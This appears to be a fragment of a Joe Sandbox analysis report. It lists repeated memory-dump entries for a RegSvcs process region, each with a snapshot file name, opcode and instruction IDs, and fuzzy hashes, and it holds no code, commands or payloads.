                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9dda2527408836ace03295499425cd97a206e865ec54ffa10d66c86be83615b0
                                    • Instruction ID: a76829b4443b2641551167cdbae68d216107945af191a50e8c73755af6fcd8c6
                                    • Opcode Fuzzy Hash: 9dda2527408836ace03295499425cd97a206e865ec54ffa10d66c86be83615b0
                                    • Instruction Fuzzy Hash: AF21C475A002198FDB04DF98C580ADDFBF6FF88310F1482AAE915AB344E774AE45CB90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aab75c2e57ce6bf1ef9245f0637046d5f6b324073f7a8210f3a8f0bba6c769a5
                                    • Instruction ID: 64fbd8ae9b50c9311cf19be0a031ac903784786b071f1405d71f5894d2a6df3f
                                    • Opcode Fuzzy Hash: aab75c2e57ce6bf1ef9245f0637046d5f6b324073f7a8210f3a8f0bba6c769a5
                                    • Instruction Fuzzy Hash: 9011A334B002199FDB14DB7998096BE7AB7FB98610F1481ADE536D7354EA30AE4087D0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41f27d187763626e82b6ead17b498eb2eec22372fb8784746f4198c761981db5
                                    • Instruction ID: ca16622b4d58d8fceed9620b21e8cdf5c57ce14ddef14dea142553ca2787f974
                                    • Opcode Fuzzy Hash: 41f27d187763626e82b6ead17b498eb2eec22372fb8784746f4198c761981db5
                                    • Instruction Fuzzy Hash: 1601FE32B0414C6FCF158E5C9810ABE7BABEFC9250B144095FA11C7250DA719D11CBB0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ebd1454c07a1afc3c1859fe8ba23100cf3fb8e63b144ad380c1fee0cb3d27d4e
                                    • Instruction ID: 737a7a7465599d7f69aab89195ce4e26c5093075da7e0950320c695eaa74c02d
                                    • Opcode Fuzzy Hash: ebd1454c07a1afc3c1859fe8ba23100cf3fb8e63b144ad380c1fee0cb3d27d4e
                                    • Instruction Fuzzy Hash: B11115B58007498FDB20CF9AD845BDEBBF4EB48324F208459D519A7250D774A944CFA5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1d4b4bd698f1128995455efbdce9ad6fef36de6b4c6d8ccc34fc49b724214ab
                                    • Instruction ID: 8923e3233971282526381f8bae277e7c1689e569e6cad9018bfd154cf17eb21a
                                    • Opcode Fuzzy Hash: b1d4b4bd698f1128995455efbdce9ad6fef36de6b4c6d8ccc34fc49b724214ab
                                    • Instruction Fuzzy Hash: 1B1112B58047498FDB20DF9AC484BDEBBF4EB48324F208459D529A7250C374A944CFA5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1bdfa79d40b4b48060474dc3f87fd08ab07f293bd641801ca83a41e6c8c83ee0
                                    • Instruction ID: 472688f593f54259a78cc72515eded0555039724cb4e38bdcbf3d534651d9ce5
                                    • Opcode Fuzzy Hash: 1bdfa79d40b4b48060474dc3f87fd08ab07f293bd641801ca83a41e6c8c83ee0
                                    • Instruction Fuzzy Hash: 97F0F670E4454D9BC770DE7C5408479BFF9E349211F4445E7D43ADF684D630AA008B81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c0ccec43997460a1ef6c52e5b3803dea5b963c4902c9dbf50181d9a3634da324
                                    • Instruction ID: b2913911a53ff284708607d2fbca2da6194788030528f104ca98758b8baf3bf0
                                    • Opcode Fuzzy Hash: c0ccec43997460a1ef6c52e5b3803dea5b963c4902c9dbf50181d9a3634da324
                                    • Instruction Fuzzy Hash: 8EF08C343802059FD364EF39E888F1677A6FB89720F258298F5219F7E4CA70EC418B50
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c482327b3cdc756e79783251fa006b8fac10d8e4d47d63cb419af6eb55e1d44
                                    • Instruction ID: fd30cad8e4d053099f3756e2eddbe5f3c3fde7591c11247851dd2a42b98f5d01
                                    • Opcode Fuzzy Hash: 4c482327b3cdc756e79783251fa006b8fac10d8e4d47d63cb419af6eb55e1d44
                                    • Instruction Fuzzy Hash: ACE06833B5849893CB1485BD99087667ECF93C9220F5484EBE67ACB7CDDC20EC0083A5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27d2d54e1e1529dd92ae16386b732faefe72a2d47df625560c4b6e48bf458ee6
                                    • Instruction ID: 1a47a2bfcabe9e60c15446e3ab3125c998ea7c18d132772fb97b880439b1da02
                                    • Opcode Fuzzy Hash: 27d2d54e1e1529dd92ae16386b732faefe72a2d47df625560c4b6e48bf458ee6
                                    • Instruction Fuzzy Hash: 1EE0683120C3E44FD30585686A03112BB26AB86A1471980EBE909CF306D6138C2283D3
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5c82a77aa1f26147ddea24f90bbf07ffa39b858af72e638a4ef748d00bac31bc
                                    • Instruction ID: 1bb6493613c624658a33be872d3bf66de617d6aff7c44ab5701de3ec376b2930
                                    • Opcode Fuzzy Hash: 5c82a77aa1f26147ddea24f90bbf07ffa39b858af72e638a4ef748d00bac31bc
                                    • Instruction Fuzzy Hash: FEE0E5327001168BC714BA34B46816AB757EBC8601BC54436D806CB688DE70A9478B81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31cff694396ee928f6c7481597b8a08db4af71a2e341dd79291425d03c83b164
                                    • Instruction ID: 7e237d1b1e44ebf4182bcd1fed7c5e8d025142ae105e9bc86e936c29e749b6c4
                                    • Opcode Fuzzy Hash: 31cff694396ee928f6c7481597b8a08db4af71a2e341dd79291425d03c83b164
                                    • Instruction Fuzzy Hash: E4E0CD3171481893D754557D6504556B5CF93C9661B5084A7E62ACBBCCCD70EC1043D9
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4b91f1dd026e5b79f52e8f30e2c3a95fbd283525041c20cf563a60e9a5bebf9
                                    • Instruction ID: d79580b967600bf4bae8c168efce53a338cae16a6c2d404c4cf79cb6816a155e
                                    • Opcode Fuzzy Hash: a4b91f1dd026e5b79f52e8f30e2c3a95fbd283525041c20cf563a60e9a5bebf9
                                    • Instruction Fuzzy Hash: C7D095323542BC47D344547D6A07167754FE7C5A50B4084A3E516CF304D951DD3043C6
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3b56cab2afb14b249bb076b7c5f68e893566042ccc3e11259c1cf53278eb306
                                    • Instruction ID: fd7d4dcfde9a7542d6f3d6d7c8c4c29436af5bf2cb71f52b10e6822ab1275c81
                                    • Opcode Fuzzy Hash: f3b56cab2afb14b249bb076b7c5f68e893566042ccc3e11259c1cf53278eb306
                                    • Instruction Fuzzy Hash: ABE086317001118B8368FA68746C0267357BBC92017954436C806CB78CEF70DD038781
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8db9c8e70d0ac5ec848712b0be6b184247761067144f6d2125377951f65b3ca4
                                    • Instruction ID: 210702f673a99c7d3f1a3203bc7618e9a5506d2f63b4024bfa72412921bb508d
                                    • Opcode Fuzzy Hash: 8db9c8e70d0ac5ec848712b0be6b184247761067144f6d2125377951f65b3ca4
                                    • Instruction Fuzzy Hash: A5E086B570014A8B8704DF7D816616EB597BBC4110300C93EC029DB340DBB4DD549FD1
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de1810610e7758922893d1f403b0c0fade298be7ad75f010ea4ab1c087a721ba
                                    • Instruction ID: 1ca5282e4fab736219d86bacfd0089898d74c58a8ce488393ea24d818431bc9f
                                    • Opcode Fuzzy Hash: de1810610e7758922893d1f403b0c0fade298be7ad75f010ea4ab1c087a721ba
                                    • Instruction Fuzzy Hash: 4CD0673AB40008DFCF049F99E8549DDF776FF98261B048556FA25E3260C6319921DB60
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c056099ba8cacbfe146b7013431126e11450b622bbd9bc5511d89952ccb55da
                                    • Instruction ID: 84bc8858545eaaa3c0d00a2ef60d732c40b31e7a8cf15fe092c1ddd7e52f68bc
                                    • Opcode Fuzzy Hash: 0c056099ba8cacbfe146b7013431126e11450b622bbd9bc5511d89952ccb55da
                                    • Instruction Fuzzy Hash: 10D01774A501508FC758EF38F51C819B7E1BB99A04394846AD806CB7A4DB74EE448B40
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f7965f2108c161210e25257c9c46886c30d2fb7505bd408f6c1aa8b3f79c81b
                                    • Instruction ID: a524941604da37e7335fc6323b60e9c9b06dcde44f2d3ca67ef45dfb4c49292d
                                    • Opcode Fuzzy Hash: 7f7965f2108c161210e25257c9c46886c30d2fb7505bd408f6c1aa8b3f79c81b
                                    • Instruction Fuzzy Hash: 4BC0127040020FCAD649EB7AF854955B77EEA80200740D518D7060A219DF78DCCA4694
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c10ed711d7bb5d35660a8fd09f892aced96e411c5de33df5ff14ef91be0fb75
                                    • Instruction ID: e312a03c54157728ad5c1580989577cfe239b8a4a8f6b493f6c5a845db865714
                                    • Opcode Fuzzy Hash: 2c10ed711d7bb5d35660a8fd09f892aced96e411c5de33df5ff14ef91be0fb75
                                    • Instruction Fuzzy Hash: FAC0802144D7C1BFC3035710FC1D4477F226E22246745418AF48056073C6515D27C371